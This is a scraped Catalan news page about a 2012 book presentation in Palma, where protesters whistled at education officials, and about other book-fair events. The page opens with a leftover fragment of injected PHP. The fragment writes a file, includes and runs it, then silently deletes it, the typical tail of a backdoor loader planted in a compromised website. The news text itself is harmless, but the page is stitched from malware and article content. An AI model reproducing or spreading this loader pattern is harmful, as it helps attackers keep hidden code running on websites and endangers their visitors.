");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Presentació del llibre "Les possessions mallorquines: passat i present"
Cercador de Notícies
Calendari de notícies
06/06/2012 Diari Balears Maria Llull

Presentació del llibre "Les possessions mallorquines: passat i present"

Un total de dotze policies varen garantir ahir l'ordre en la presentació del llibre Les possessions mallorquines, passat i present (Documenta Balear). El motiu fou de caire preventiu, ja que hi estava prevista la presència del conseller d'Educació, Cultura i Universitats, Rafel Bosch, a qui esperaven una cinquantena de persones disposades a fer sentir la seva protesta amb xiulets.

Però Bosch no hi aparegué. "Li ha sorgit un imprevist per un altre compromís", digué la directora general de Cultura, Isabel Cerdà, després de l'esdeveniment, encara que fonts de la Conselleria argumentaren una indisposició de caire personal. Isabel Cerdà; Miquel Deyà, director general d'Universitats; i Tòfol Vidal, director de l'IEB, hagueren de patir els xiulets dels presents, que es perllongaren durant uns 20 minuts després de la presentació. "Prou retallades a l'educació", "Rafel Bosch, dimissió" i "A Mallorca, en català", foren algunes de les consignes que se sentiren a les Estacions durant la protesta.

Però no tot foren protestes ahir a la Fira del Llibre i la Setmana del Llibre en Català. L'autor Miquel Segura hi donà a conèixer La història som nosaltres, un llibre que completa una trilogia sobre els descendents dels jueus conversos a Mallorca, un col·lectiu que, segons l'autor, mereix una rehabilitació històrica.

Els actes començaran avui amb una xerrada sobre literatura fantàstica i continuaran amb la presentació del quart volum de la Història de la Ciència, titulat El segle XIX, fins a la Restauració. El plat fort serà la presentació de les obres guanyadores dels premis Ciutat de Palma 2011, amb els autors Jordi Julià, Josep Maria Quintana, Luis M. García i Noni Benegas.

Anau a la notícia

Recomanar
Comentar
Comentaris (0)